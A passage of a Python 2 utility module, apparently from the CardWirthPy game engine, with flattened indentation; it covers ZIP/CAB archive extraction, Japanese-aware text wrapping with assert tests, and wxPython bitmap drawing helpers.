dname = splitext(os.path.basename(path))[0]
if overwrite:
paths = set()
else:
dstdir = join_paths(dstdir, dname)
dstdir = dupcheck_plus(dstdir, False)
seq = z.infolist()
if startup:
startup(len(seq))
for i, (zname, info) in enumerate(zip(z.namelist(), z.infolist())):
if progress and i % 10 == 0:
if progress(i):
if overwrite:
break
else:
z.close()
remove(dstdir)
return
name = decode_zipname(zname).replace('\\', '/')
normpath = os.path.normpath(name)
if os.path.isabs(normpath):
continue
if normpath == ".." or normpath.startswith(".." + os.path.sep):
continue
if name.endswith("/"):
name = name.rstrip("/")
dpath = join_paths(dstdir, name)
if dpath and not os.path.isdir(dpath):
os.makedirs(dpath)
else:
fpath = join_paths(dstdir, name)
dpath = os.path.dirname(fpath)
if dpath and not os.path.isdir(dpath):
os.makedirs(dpath)
if isinstance(info.date_time, datetime.datetime):
mtime = time.mktime(time.strptime(info.date_time.strftime("%Y/%m/%d %H:%M:%S"), "%Y/%m/%d %H:%M:%S"))
else:
mtime = time.mktime(time.strptime("%d/%02d/%02d %02d:%02d:%02d" % (info.date_time), "%Y/%m/%d %H:%M:%S"))
if overwrite:
            # When overwriting, writing a file can fail (e.g. a BGM that
            # is currently playing); in that case rename the existing
            # target out of the way and retry.
paths.add(os.path.normcase(os.path.normpath(os.path.abspath(fpath))))
if not os.path.isfile(fpath) or os.path.getmtime(fpath) <> mtime:
data = z.read(zname)
try:
with open(fpath, "wb") as f:
f.write(data)
f.flush()
f.close()
except:
                # rename and retry
if os.path.isfile(fpath):
dst = join_paths(u"Data/Temp/Global/Deleted", os.path.basename(fpath))
dst = dupcheck_plus(dst, False)
if not os.path.isdir(u"Data/Temp/Global/Deleted"):
os.makedirs(u"Data/Temp/Global/Deleted")
rename_file(fpath, dst)
with open(fpath, "wb") as f:
f.write(data)
f.flush()
f.close()
else:
continue
else:
data = z.read(zname)
with open(fpath, "wb") as f:
f.write(data)
f.flush()
f.close()
os.utime(fpath, (os.path.getatime(fpath), mtime))
z.close()
if overwrite:
for dpath, _dnames, fnames in os.walk(dstdir):
for fname in fnames:
path = join_paths(dpath, fname)
path = os.path.normcase(os.path.normpath(os.path.abspath(path)))
if not path in paths:
remove(path)
if progress:
progress(len(seq))
return dstdir
def decode_zipname(name):
    """Decode an archived file name, trying the likely encodings in order."""
    if not isinstance(name, unicode):
        for encoding in ("utf_8_sig", cw.MBCS, "euc-jp", "utf-8", "utf-16", "utf-32"):
            try:
                return name.decode(encoding)
            except UnicodeDecodeError:
                continue
    return name
def decode_text(name):
    """Decode text, trying Unicode encodings first, then local ones."""
    if not isinstance(name, unicode):
        for encoding in ("utf_8_sig", "utf-8", "utf-16", "utf-32", cw.MBCS, "euc-jp"):
            try:
                return name.decode(encoding)
            except UnicodeDecodeError:
                continue
    return name
def read_zipdata(zfile, name):
    """Read a member from zfile; the stored name may use any of several encodings."""
    try:
        return zfile.read(name)
    except KeyError:
        pass
    for encoding in (cw.MBCS, "euc-jp", "utf-8"):
        try:
            return zfile.read(name.encode(encoding))
        except KeyError:
            continue
    return ""
def get_elementfromzip(zpath, name, tag=""):
with zip_file(zpath, "r") as z:
data = read_zipdata(z, name)
z.close()
f = StringIO.StringIO(data)
try:
element = cw.data.xml2element(name, tag, stream=f)
finally:
f.close()
return element
def decompress_cab(path, dstdir, dname="", startup=None, progress=None, overwrite=False):
"""cabファイルをdstdirに解凍する。
解凍したディレクトリのpathを返す。
"""
if not dname:
dname = splitext(os.path.basename(path))[0]
if not overwrite:
dstdir = join_paths(dstdir, dname)
dstdir = dupcheck_plus(dstdir, False)
if overwrite and os.path.isdir(dstdir):
        # All files are extracted unconditionally, so delete the
        # pre-existing files or move them to the deletion area first.
for dpath, _dnames, fnames in os.walk(dstdir):
for fname in fnames:
fpath = join_paths(dpath, fname)
dst = join_paths(u"Data/Temp/Global/Deleted", fname)
if not os.path.isdir(u"Data/Temp/Global/Deleted"):
os.makedirs(u"Data/Temp/Global/Deleted")
dst = dupcheck_plus(dst)
rename_file(fpath, dst)
remove(dst)
if startup or progress:
filenum = cab_filenum(path)
if startup:
startup(filenum)
try:
if not os.path.isdir(dstdir):
os.makedirs(dstdir)
ss = []
if sys.platform == "win32" and sys.getwindowsversion().major <= 5:
            # expand.exe on version 5 and earlier ignores the directory structure with -f:*
for dname in cab_dpaths(path):
if not dname:
continue
dstdir2 = cw.util.join_paths(dstdir, dname)
if not os.path.isdir(dstdir2):
os.makedirs(dstdir2)
ss.append("expand \"%s\" -f:\"%s\\*\" \"%s\"" % (path, dname, dstdir2))
ss.append("expand \"%s\" -f:\"*\" \"%s\"" % (path, dstdir))
else:
ss.append("expand \"%s\" -f:* \"%s\"" % (path, dstdir))
encoding = sys.getfilesystemencoding()
if progress:
class Progress(object):
def __init__(self):
self.result = None
self.cancel = False
def run(self):
for s in ss:
p = subprocess.Popen(s.encode(encoding), shell=True, close_fds=True)
r = p.poll()
while r is None:
if self.cancel:
p.kill()
time.sleep(0.001)
r = p.poll()
if r <> 0:
                            return  # failed
self.result = dstdir
prog = Progress()
thr = threading.Thread(target=prog.run)
thr.start()
count = 0
while thr.is_alive():
                # count the extracted files
last_count = count
count = 0
for dpath, _dnames, fnames in os.walk(dstdir):
count += len(fnames)
if last_count <> count:
if progress(count):
prog.cancel = True
p = time.time() + 0.1
while thr.is_alive() and time.time() < p:
time.sleep(0.001)
if prog.cancel and not overwrite:
remove(dstdir)
return None
else:
for s in ss:
if subprocess.call(s.encode(encoding), shell=True, close_fds=True) <> 0:
return None
except Exception:
cw.util.print_ex()
return None
if progress:
progress(filenum)
return dstdir
def cab_filenum(cab):
"""CABアーカイブに含まれるファイル数を返す。"""
word = struct.Struct("<h")
try:
with io.BufferedReader(io.FileIO(cab, "rb")) as f:
            # header
            buf = f.read(36)
            if buf[:4] != "MSCF":
return 0
cfiles = word.unpack(buf[28:30])[0]
return cfiles
except Exception:
cw.util.print_ex()
return 0
def cab_hasfile(cab, fname):
"""CABアーカイブに指定された名前のファイルが含まれているか判定する。"""
if not os.path.isfile(cab):
return ""
dword = struct.Struct("<l")
word = struct.Struct("<h")
if isinstance(fname, (str, unicode)):
fname = os.path.normcase(fname)
else:
s = set()
for name in fname:
s.add(os.path.normcase(name))
fname = s
encoding = "cp932"
try:
with io.BufferedReader(io.FileIO(cab, "rb")) as f:
            # header
            buf = f.read(36)
            if buf[:4] != "MSCF":
                return ""
cofffiles = dword.unpack(buf[16:20])[0]
cfiles = word.unpack(buf[28:30])[0]
f.seek(cofffiles)
for _i in xrange(cfiles):
buf = f.read(16)
attribs = word.unpack(buf[14:16])[0]
name = []
while True:
c = str(f.read(1))
if c == '\0':
break
name.append(c)
name = "".join(name)
_A_NAME_IS_UTF = 0x80
if not (attribs & _A_NAME_IS_UTF):
name = unicode(name, encoding)
                if isinstance(fname, (str, unicode)):
                    if fname == os.path.normcase(os.path.basename(name)):
                        return name
                else:
                    if os.path.normcase(os.path.basename(name)) in fname:
                        return name
except Exception:
cw.util.print_ex()
return ""
def cab_dpaths(cab):
"""CABアーカイブ内のディレクトリのsetを返す。"""
if not os.path.isfile(cab):
return ""
dword = struct.Struct("<l")
word = struct.Struct("<h")
r = set()
encoding = "cp932"
try:
with io.BufferedReader(io.FileIO(cab, "rb")) as f:
            # header
            buf = f.read(36)
            if buf[:4] != "MSCF":
                return set()
cofffiles = dword.unpack(buf[16:20])[0]
cfiles = word.unpack(buf[28:30])[0]
f.seek(cofffiles)
for _i in xrange(cfiles):
buf = f.read(16)
attribs = word.unpack(buf[14:16])[0]
name = []
while True:
c = str(f.read(1))
if c == '\0':
break
name.append(c)
name = "".join(name)
_A_NAME_IS_UTF = 0x80
if not (attribs & _A_NAME_IS_UTF):
name = unicode(name, encoding)
i = name.rfind(u"\\")
if i == -1:
r.add(u"")
else:
dname = name[:i]
r.add(dname)
except Exception:
cw.util.print_ex()
return r
def cab_scdir(cab):
"""CABアーカイブ内でSummary.wsmまたは
Summary.xmlが含まれるフォルダを返す。
"""
fpath = cab_hasfile(cab, ("Summary.xml", "Summary.wsm"))
return os.path.dirname(fpath)
#-------------------------------------------------------------------------------
# Text manipulation
#-------------------------------------------------------------------------------
def encodewrap(s):
"""改行コードを\nに置換する。"""
r = []
if not s:
return u""
for c in s:
if c == '\\':
r.append("\\\\")
elif c == '\n':
r.append("\\n")
elif c == '\r':
pass
else:
r.append(c)
return "".join(r)
def decodewrap(s, code="\n"):
"""\nを改行コードに戻す。"""
if not s:
return u""
r = []
bs = False
for c in s:
if bs:
if c == 'n':
r.append(code)
elif c == '\\':
r.append('\\')
else:
r.append(c)
bs = False
elif c == '\\':
bs = True
else:
r.append(c)
return "".join(r)
def encodetextlist(arr):
"""arrを\n区切りの文字列にする。"""
return encodewrap("\n".join(arr))
def decodetextlist(s):
"""\n区切りの文字列を文字配列にする。"""
if not s:
return []
return decodewrap(s).split("\n")
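# Round-trip checks (added for illustration, in the same assert style used
# elsewhere in this module):
assert encodewrap(u"a\nb\\c") == u"a\\nb\\\\c"
assert decodewrap(encodewrap(u"a\nb\\c")) == u"a\nb\\c"
assert decodetextlist(encodetextlist([u"a", u"b"])) == [u"a", u"b"]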
def is_hw(unichr):
"""unichrが半角文字であればTrueを返す。"""
return not unicodedata.east_asian_width(unichr) in ('F', 'W', 'A')
def get_strlen(s):
    # the initial value 0 also makes this safe for empty strings
    return reduce(lambda a, b: a + b, map(lambda c: 1 if is_hw(c) else 2, s), 0)
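# Width checks (added for illustration): half-width characters count as 1,
# full-width characters as 2.
assert get_strlen(u"") == 0
assert get_strlen(u"Aあ") == 3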
def slice_str(s, width, get_width=None):
"""
    Slice s at the display position width and return the two resulting strings.
"""
s = unicode(s)
if not get_width:
get_width = get_strlen
left = []
leftlen = 0
for c in s:
clen = get_width(c)
if width < leftlen+clen:
break
left.append(c)
leftlen += clen
return u"".join(left), s[len(left):]
assert slice_str(u"ABC", 2) == (u"AB", u"C")
assert slice_str(u"ABCあ", 4) == (u"ABC", u"あ")
def rjustify(s, length, c):
slen = cw.util.get_strlen(s)
if slen < length:
s += c * (length - slen)
return s
def ljustify(s, length, c):
slen = cw.util.get_strlen(s)
if slen < length:
s = (c * (length - slen)) + s
return s
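# Note (illustrative): despite their names, rjustify pads on the right
# (left-aligns) and ljustify pads on the left (right-aligns), measured with
# get_strlen; e.g. rjustify(u"ab", 4, u"*") -> u"ab**",
# ljustify(u"ab", 4, u"*") -> u"**ab".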
WRAPS_CHARS = u"。|、|,|、|。|.|)|」|』|〕|}|】"
def txtwrap(s, mode, width=30, wrapschars="", encodedtext=True, spcharinfo=None):
"""引数の文字列を任意の文字数で改行する(全角は2文字として数える)。
mode=1: カード解説。
mode=2: 画像付きメッセージ(台詞)用。
mode=3: 画像なしメッセージ用。
mode=4: キャラクタ情報ダイアログの解説文・張り紙説明用。
mode=5: 素質解説文用。
mode=6: メッセージダイアログ用。
"""
if mode == 1:
wrapschars = WRAPS_CHARS
width = 37
elif mode == 2:
wrapschars = ""
width = 32
elif mode == 3:
wrapschars = ""
width = 42
elif mode == 4:
wrapschars = WRAPS_CHARS
width = 37
elif mode == 5:
wrapschars = WRAPS_CHARS
width = 24
elif mode == 6:
wrapschars = WRAPS_CHARS
width = 48
if encodedtext:
        # convert \n escapes back into line breaks
s = cw.util.decodewrap(s)
    # set of characters forbidden at the start of a line
r_wchar = re.compile(wrapschars) if not mode in (2, 3) and wrapschars else None
    # set of special-character markers
re_color = "&[\x20-\x7E]"
r_spchar = re.compile("#.|" + re_color) if mode in (2, 3) else None
if spcharinfo is not None:
spcharinfo2 = []
cnt = 0
asciicnt = 0
wraped = False
skip = False
spchar = False
defspchar = False
wrapafter = False
seq = []
seqlen = 0
skipchars = ""
def seq_insert(index, char):
if index < 0:
index = len(seq) + index
seq.insert(index, char)
if spcharinfo is not None:
for i in reversed(xrange(len(spcharinfo2))):
spi = spcharinfo2[i]
if spi < index:
break
else:
spcharinfo2[i] += len(char)
def insert_wrap(index):
        # insert a line break
seq_insert(index, '\n')
if spcharinfo is not None:
            # remember the position where the break was inserted
if index < 0:
index = len(seq) + index
if index == len(seq):
spcharinfo2.append(seqlen)
else:
spcharinfo2.append(reduce(lambda l, s: l + len(s), seq[:index], 0))
for index, char in enumerate(s):
spchar2 = spchar
spchar = False
width2 = width
wrapafter2 = wrapafter
defspchar2 = defspchar
defspchar = False
if r_spchar and not defspchar2:
if skip:
if spcharinfo is not None and index in spcharinfo:
spcharinfo2.append(seqlen)
seq.append(char)
seqlen += len(char)
skip = False
if skipchars.startswith("#"):
cnt += len(char)
asciicnt = 0
if width+1 < cnt:
if not wrapafter:
insert_wrap(len(seq))
seqlen += len("\n")
cnt = 0
asciicnt = 0
wraped = False
wrapafter = True
continue
chars = char + get_char(s, index + 1)
if r_spchar.match(chars.lower()):
if spcharinfo is not None and index in spcharinfo:
spcharinfo2.append(seqlen)
if not chars.startswith("#") or\
not chars[:2].lower() in cw.cwpy.rsrc.specialchars or\
cw.cwpy.rsrc.specialchars[chars[:2].lower()][1]:
if width < cnt and chars.startswith("#"):
if not wrapafter:
insert_wrap(len(seq))
seqlen += len("\n")
cnt = 0
asciicnt = 0
seq.append(char)
seqlen += len(char)
skip = True
if chars.startswith("#"):
cnt += len(char)
skipchars = chars
continue
spchar = True
if not chars.startswith("&"):
wrapafter = False
defspchar = True
        # characters forbidden at line start
if cnt == 0 and not wraped and r_wchar and r_wchar.match(char):
seq_insert(-1, char)
seqlen += len(char)
asciicnt = 0
wraped = True
        # line-break character
elif char == "\n":
if not wrapafter:
seq.append(char)
seqlen += len(char)
cnt = 0
asciicnt = 0
wraped = False
wrapafter = False
        # half-width character
elif is_hw(char):
seq.append(char)
seqlen += len(char)
cnt += 1
if not (mode in (2, 3) or (mode in (1, 4) and char == ' ')) and not (mode == 1 and index+1 < len(s) and not is_hw(s[index+1])):
asciicnt += 1
if spchar2 or not (mode in (2, 3) or (mode in (1, 4) and char == ' ')) or len(s) <= index+1 or is_hw(s[index+1]):
width2 += 1
wrapafter = False
        # anything other than the above (full-width characters)
else:
seq.append(char)
seqlen += len(char)
cnt += 2
asciicnt = 0
wrapafter = False
if mode in (1, 2, 3) and index+1 < len(s) and is_hw(s[index+1]):
width2 += 1
        # Compatibility: from 1.28 on, a trailing half-width space changes the wrap position
        # (messages produced by events only)
if mode in (3, 4) or cw.cwpy.sdata and not cw.cwpy.sct.lessthan("1.20", cw.cwpy.sdata.get_versionhint()):
if not wrapafter2 and index+1 < len(s) and s[index+1] == " " and mode in (1, 2, 3, 4):
width2 += 1
asciicnt = 0
        # line wrapping
if not spchar and cnt > width2:
if defspchar2 and width2+1 < cnt:
index = -(cnt - (width+1))
if seq[-index] <> "\n":
insert_wrap(index)
seqlen += len("\n")
cnt = 1
elif width2 >= asciicnt > 0 and not defspchar2:
            if get_char(s, index + 1) != "\n" and seq[-asciicnt] != "\n":
insert_wrap(-asciicnt)
seqlen += len("\n")
cnt = asciicnt
elif index + 1 <= len(s) or not get_char(s, index + 1) == "\n":
if index + 2 <= len(s) or not get_char(s, index + 2) == "\n":
insert_wrap(len(seq))
seqlen += len("\n")
wrapafter = True
cnt = 0
asciicnt = 0
wraped = False
if spcharinfo is not None:
spcharinfo.clear()
spcharinfo.update(spcharinfo2)
return "".join(seq).rstrip()
def _wordwrap_impl(s, width, get_width, open_chars, close_chars, startindex, resultindex, spcharinfo, spcharinfo2):
"""
    Wrap s at the width given by width.
    get_width(s) is used to measure text length.
"""
s = unicode(s)
if not get_width:
get_width = get_strlen
    words = re.findall(u"[a-z0-9_]+|[a-zA-Z0-9_]+|.", s, re.I)
    if spcharinfo is not None:
        # separate the special characters from ordinary words beforehand
        words2 = []
        index = startindex
        spc = None
        for word in words:
            if spc:
                words2.append(spc + word[0])
                if 1 < len(word):
                    words2.append(word[1:])
                spc = None
            elif index in spcharinfo:
                spc = word
            else:
                words2.append(word)
            index += len(word)
        assert spc is None
        words = words2
    lines = []
    buf = []
    buflen = 0
    hw = get_width(u"#")
    index = startindex
    for word in words:
        # is this a special character?
is_spchar = spcharinfo is not None and index in spcharinfo
wordlen = get_width(word)
if width < buflen+wordlen:
            def match_op(buf):
                return not buf[1] and open_chars.find(buf[0]) != -1
            def match_cl(buf):
                return not buf[1] and close_chars.find(buf[0]) != -1
def match_last(bufs, matcher):
for i in xrange(len(bufs)):
buf = bufs[-(1+i)]
if buf[1] and buf[0][0] == '&':
continue
return matcher(buf)
return False
def match_op_last(bufs):
                # True if the tail of bufs is a character in open_chars,
                # ignoring colour-change special characters
return match_last(bufs, match_op)
def match_cl_last(bufs):
                # True if the tail of bufs is a character in close_chars,
                # ignoring colour-change special characters
return match_last(bufs, match_cl)
assert match_op_last([("[", False), ("&R", True), ("&R", True)])
assert match_op_last([("[", False)])
assert not match_op_last([("[", False), ("&R", False), ("&R", True)])
def append_word_wrap(buf, buflen, word):
                # append word to the line, force-wrapping it as needed
if is_spchar:
return buf, buflen, word
while width < buflen+get_width(word):
word2, word3 = slice_str(word, width-buflen, get_width)
if word2:
word2 += u"-"
buf.append((word2, False))
word = word3
lines.append(buf)
buf = []
buflen = 0
return [], 0, word
def break_before_openchar(buf2, buf, buflen, word):
                # back up past the characters forbidden at line end, then wrap
while buf2 and match_op_last(buf2):
buf2 = buf2[:-1]
if buf2:
i = len(buf2)
lines.append(buf[:i])
buf = buf[i:]
buflen = sum(map(lambda s: get_width(s[0]), buf))
return buf, buflen, word
else:
return append_word_wrap(buf, buflen, word)
if 1 <= len(buf) and match_op_last(buf) and not match_cl_last(buf):
                # the tail is a character forbidden at line end, so back up
                # to a wrappable position and wrap there
buf, buflen, word = break_before_openchar(buf, buf, buflen, word)
wordlen = get_width(word)
elif not unicode.isspace(word):
                # whitespace may pile up at the line end indefinitely, so only other characters are handled here
if match_cl((word, is_spchar)):
if width < buflen or (width == buflen and hw < wordlen):
                        # a single line-start-forbidden character may hang past the
                        # margin; beyond that, back up to a wrappable position and wrap
buf2 = buf
while buf2 and match_cl_last(buf2):
buf2 = buf2[:-1]
if not buf2 or (len(buf2) == 1 and not match_op_last(buf2)):
                            # no wrappable position was found
lines.append(buf)
buf = []
buflen = 0
elif 2 <= len(buf2) and not match_op_last(buf2[:-1]):
                            # found a wrappable position (no line-end-forbidden character at the break)
i = len(buf2)-1
lines.append(buf[:i])
buf = buf[i:]
buflen = sum(map(lambda s: get_width(s[0]), buf))
else:
                            # the wrappable position was itself a line-end-forbidden character
buf, buflen, word = break_before_openchar(buf2, buf, buflen, word)
wordlen = get_width(word)
else:
                    # wrap normally
if buf:
lines.append(buf)
buf = []
buflen = 0
buf, buflen, word = append_word_wrap(buf, buflen, word)
wordlen = get_width(word)
if word:
buf.append((word, is_spchar))
            if not is_spchar or word[0] != '&':
buflen += wordlen
index += len(word)
if buf:
lines.append(buf)
if spcharinfo2 is None:
return u"\n".join(map(lambda buf: u"".join(map(lambda w: w[0], buf)), lines))
else:
seq = []
for i, buf in enumerate(lines):
line = []
seqlen = 0
for word, is_spchar in buf:
if is_spchar:
spcharinfo2.append(resultindex)
line.append(word)
resultindex += len(word)
seq.append(u"".join(line))
if i + 1 < len(lines):
                spcharinfo2.append(resultindex)  # record the wrap position
resultindex += len(u"\n")
return u"\n".join(seq)
def wordwrap(s, width, get_width=None, open_chars=u"\"'(<[`{‘“〈《≪「『【〔(<[{「",
close_chars=u"!\"'),.:;>?]`}゜’”′″、。々>》≫」』】〕〟゛°ゝゞヽヾ〻!),.:;>?]}。」、゙゚ぁぃぅぇぉァィゥェォァィゥェォヵっッッゃゅょャュョャュョゎヮㇵㇶㇷㇸㇹㇺ…―ーー",
spcharinfo=None):
if spcharinfo is not None:
spcharinfo2 = []
else:
spcharinfo2 = None
lines = []
index = 0
resultindex = 0
for line in s.splitlines():
wrapped = _wordwrap_impl(line, width, get_width, open_chars, close_chars, index, resultindex, spcharinfo, spcharinfo2)
lines.append(wrapped)
index += len(line)+len(u"\n")
resultindex += len(wrapped)+len(u"\n")
if spcharinfo is not None:
spcharinfo.clear()
spcharinfo.update(spcharinfo2)
return u"\n".join(lines)
assert wordwrap("ABC.DEFG.H,IKLM?", 3) == "ABC.\nDEF-\nG.H,\nIKL-\nM?"
assert wordwrap("[abc..]\ndefg", 3) == "[ab-\nc..]\ndef-\ng"
assert wordwrap("abc..\ndefghij", 3) == "abc.\n.\ndef-\nghi-\nj"
assert wordwrap("a bc..", 4) == "a \nbc.."
assert wordwrap("a bc....],.\ndef", 4) == "a \nbc...\n.],.\ndef"
assert wordwrap("[def]", 4) == "[def]"
assert wordwrap("def[ghi]]", 4) == "def\n[ghi\n]]"
assert wordwrap(u"あいうえお。かきくけこ", 11) == u"あいうえお。\nかきくけこ"
assert wordwrap(u"あいうえAA。かきくけこ", 9) == u"あいうえ\nAA。かき\nくけこ"
assert wordwrap("[[[[a", 4) == "[[[[\na"
assert wordwrap("\"Let's it go!!\"", 4) == "\"Let'\ns it \ngo!!\""
assert wordwrap(u"あいうえおA.かきくけこ", 11) == u"あいうえおA.\nかきくけこ"
assert wordwrap(u"あいうえおA。かきくけこ", 11) == u"あいうえお\nA。かきくけ\nこ"
assert wordwrap(u"pqr pqr PQR", 6) == u"pqr \npqr \nPQR"
def _test_wordwrap(s, width, spcharinfo):
return wordwrap(s, width, spcharinfo=spcharinfo), spcharinfo
assert _test_wordwrap(u"CARD #WIRTH SPECIA&L\nCHA&RACTER #TEST!", 8, spcharinfo=set([5, 18, 24, 32])) ==\
(u"CARD #W\nIRTH \nSPECIA&L\nCHA&RACTER \n#TEST!", set([5, 7, 13, 20, 26, 34, 35]))
assert _test_wordwrap(u"wordwrap", 4, spcharinfo=set()) == \
(u"word-\nwrap", set([5]))
assert wordwrap(u"[&Rabc..]", 3, spcharinfo=set([1])) == u"[&Rab-\nc..]"
assert wordwrap(u"ab...", 3) == u"ab..\n."
assert _test_wordwrap("ab..&R.", 3, spcharinfo=set([4])) == ("ab..\n&R.", set([4, 5]))
def get_char(s, index):
try:
        if 0 <= index < len(s):
return s[index]
return ""
except:
return ""
def format_title(fmt, d):
"""foobar2000の任意フォーマット文字列のような形式で
文字列の構築を行う。
* %%で囲われた文字列は変数となり、辞書dから得られる値に置換される。
* []で囲われた文字列は、その内側で使用された変数がなければ丸ごと無視される。
* \の次の文字列は常に通常文字となる。
例えば次のようになる:
d = { "application":"CardWirthPy", "skin":"スキン名", "yado":"宿名" }
s = format_title("%application% %skin%[ - %yado%[ %scenario%]]", d)
assert s == "CardWirthPy スキン名 - 宿名"
"""
class _FormatPart(object):
"""フォーマット内の変数。"""
def __init__(self, name):
self.name = name
def eat_parts(fmt, subsection):
"""formatを文字列とFormatPartのリストに分解。
[]で囲われた部分はサブリストとする。
"""
seq = []
bs = False
while fmt:
c = fmt[0]
fmt = fmt[1:]
if bs:
seq.append(c)
bs = False
elif c == "\\":
bs = True
elif c == "]" and subsection:
return fmt, seq
elif c == "%":
ci = fmt.find("%")
                if ci != -1:
seq.append(_FormatPart(fmt[:ci]))
fmt = fmt[ci+1:]
elif c == "[":
fmt, list2 = eat_parts(fmt, True)
seq.append(list2)
else:
seq.append(c)
return fmt, seq
fmt, l = eat_parts(fmt, False)
assert not fmt
def do_format(l):
"""フォーマットを実行する。"""
seq = []
use = False
for sec in l:
if isinstance(sec, _FormatPart):
name = d.get(sec.name, "")
if name:
seq.append(name)
use = True
elif isinstance(sec, list):
text, use2 = do_format(sec)
if use2:
seq.append(text)
use = True
else:
seq.append(sec)
return "".join(seq), use
return do_format(l)[0]
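# Check (added for illustration): a variable missing from d collapses its
# enclosing [] section.
assert format_title("%application%[ - %yado%]", {"application": "CardWirthPy"}) == "CardWirthPy"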
#-------------------------------------------------------------------------------
# General wx helpers
#-------------------------------------------------------------------------------
def load_wxbmp(name="", mask=False, image=None, maskpos=(0, 0), f=None, retry=True, can_loaded_scaledimage=True,
noscale=False, up_scr=None):
"""pos(0,0)にある色でマスクしたwxBitmapを返す。"""
if sys.platform <> "win32":
assert threading.currentThread() <> cw.cwpy
if not f and (not cw.binary.image.code_to_data(name) and not os.path.isfile(name)) and not image:
return wx.EmptyBitmap(0, 0)
if cw.cwpy and cw.cwpy.rsrc:
name = cw.cwpy.rsrc.get_filepath(name)
if up_scr is None:
        up_scr = cw.UP_SCR  # use render-size images even in dialogs etc., to match the game screen
name, up_scr = find_scaledimagepath(name, up_scr, can_loaded_scaledimage, noscale)
ext = ""
haspngalpha = False
bmpdepth = 0
maskcolour = None
isjpg = False
if mask:
if not image:
try:
if f:
data = f.read()
elif cw.binary.image.path_is_code(name):
data = cw.binary.image.code_to_data(name)
else:
if not os.path.isfile(name):
return wx.EmptyBitmap(0, 0)
with open(name, "rb") as f2:
data = f2.read()
f2.close()
if not data:
return wx.EmptyBitmap(0, 0)
ext = get_imageext(data)
if ext == ".png":
haspngalpha = cw.image.has_pngalpha(data)
bmpdepth = cw.image.get_bmpdepth(data)
data, ok1 = cw.image.fix_cwnext32bitbitmap(data)
data, ok2 = cw.image.fix_cwnext16bitbitmap(data)
if isinstance(data, wx.Image):
image = data
elif name and ok1 and ok2 and not cw.binary.image.path_is_code(name):
                    # BUG: wx.ImageFromStream() over io.BytesIO() is a further
                    # 10x slower than even reading the file twice
image = wx.Image(name)
else:
                    with io.BytesIO(data) as f2:
                        image = wx.ImageFromStream(f2, wx.BITMAP_TYPE_ANY, -1)
except:
print_ex()
print u"画像が読み込めません(load_wxbmp)", name
return wx.EmptyBitmap(0, 0)
def set_mask(image, maskpos):
maskpos = convert_maskpos(maskpos, image.Width, image.Height)
r = image.GetRed(maskpos[0], maskpos[1])
g = image.GetGreen(maskpos[0], maskpos[1])
b = image.GetBlue(maskpos[0], maskpos[1])
image.SetMaskColour(r, g, b)
return (r, g, b)
if not image.IsOk():
return wx.EmptyBitmap(0, 0)
if not haspngalpha and not image.HasAlpha() and not image.HasMask():
maskcolour = set_mask(image, maskpos)
wxbmp = image.ConvertToBitmap()
        # With 255-colour GIFs and the like, a colour that is absent from the
        # palette can end up set as the mask colour; in that case fall back to
        # the top-left pixel colour as usual.
        # If this handling ever causes problems, the code from this if
        # statement onward will have to be removed.
if mask and image.HasMask() and image.CountColours() <= 255:
palette = wxbmp.GetPalette()
if not palette is None:
mask = (image.GetMaskRed(), image.GetMaskGreen(), image.GetMaskBlue())
maskok = False
for pixel in xrange(palette.GetColoursCount()):
if palette.GetRGB(pixel) == mask:
maskok = True
break
if not maskok:
maskcolour = set_mask(image, maskpos)
wxbmp = image.ConvertToBitmap()
elif image:
wxbmp = image.ConvertToBitmap()
else:
try:
wxbmp = wx.Bitmap(name)
except:
print u"画像が読み込めません(load_wxbmp)", name
return wx.EmptyBitmap(0, 0)
if bmpdepth == 1 and mask:
wxbmp.bmpdepthis1 = True
if maskcolour:
wxbmp.maskcolour = maskcolour
wxbmp.scr_scale = up_scr
return wxbmp
def copy_wxbmp(bmp):
"""wx.Bitmapのコピーを生成する。"""
w = bmp.GetWidth()
h = bmp.GetHeight()
return bmp.GetSubBitmap((0, 0, w, h))
def convert_to_image(bmp):
"""wx.Bitmapをwx.Imageに変換する。
FIXME: 直接bmp.ConvertToImage()を使用すると
画像が化ける事がある
"""
w = bmp.GetWidth()
h = bmp.GetHeight()
buf = array.array('B', [0] * (w*h * 3))
bmp.CopyToBuffer(buf)
img = wx.ImageFromBuffer(w, h, buf)
if hasattr(bmp, "bmpdepthis1"):
img.bmpdepthis1 = bmp.bmpdepthis1
if hasattr(bmp, "maskcolour"):
r, g, b = bmp.maskcolour
img.SetMaskColour(r, g, b)
return img
def fill_image(img, surface, csize, ctrlpos=(0, 0), cpos=(0, 0)):
"""引数のsurfaceをimg上に敷き詰める。"""
imgsize = surface.get_size()
w, h = imgsize
startx = -(ctrlpos[0] % w)
starty = -(ctrlpos[1] % h)
x = startx
while x < csize[0]:
y = starty
while y < csize[1]:
img.blit(surface, (x+cpos[0], y+cpos[1]))
y += h
x += w
def fill_bitmap(dc, bmp, csize, ctrlpos=(0, 0), cpos=(0, 0)):
"""引数のbmpを敷き詰める。"""
imgsize = bmp.GetSize()
w, h = imgsize
startx = -(ctrlpos[0] % w)
starty = -(ctrlpos[1] % h)
x = startx
while x < csize[0]:
y = starty
while y < csize[1]:
dc.DrawBitmap(bmp, x+cpos[0], y+cpos[1], False)
y += h
x += w
def get_centerposition(size, targetpos, targetsize=(1, 1)):
"""中央取りのpositionを計算して返す。"""
top, left = targetsize[0] / 2 , targetsize[1] / 2
top, left = targetpos[0] + top, targetpos[1] + left
top, left = top - size[0] / 2, left - size[1] /2
return (top, left)
def draw_center(dc, target, pos, mask=True):
"""指定した座標にBitmap・テキストの中央を合わせて描画。
target: wx.Bitmapかstrかunicode
"""
if isinstance(target, (str, unicode)):
size = dc.GetTextExtent(target)
pos = get_centerposition(size, pos)
dc.DrawText(target, pos[0], pos[1])
elif isinstance(target, wx.Bitmap):
size = target.GetSize()
pos = get_centerposition(size, pos)
dc.DrawBitmap(target, pos[0], pos[1], mask)
def draw_height(dc, target, height, mask=True):
"""高さのみ指定して、横幅は背景の中央に合わせてBitmap・テキストを描画。
target: wx.Bitmapかstrかunicode
"""
if isinstance(target, (str, unicode)):
width = (dc.GetSize()[0] - dc.GetTextExtent(target)[0]) / 2
dc.DrawText(target, width, height)
elif isinstance(target, wx.Bitmap):
width = (dc.GetSize()[0] - target.GetSize()[0]) / 2
dc.DrawBitmap(target, width, height, mask)
def draw_box(dc, pos, size):
"""dcでStaticBoxの囲いを描画する。"""
# ハイライト
colour = wx.SystemSettings.GetColour(wx.SYS_COLOUR_3DHIGHLIGHT)
dc.SetPen(wx.Pen(colour, 1, wx.SOLID))
box = get_boxpointlist((pos[0] + 1, pos[1] + 1), size)
dc.DrawLineList(box)
    # main line
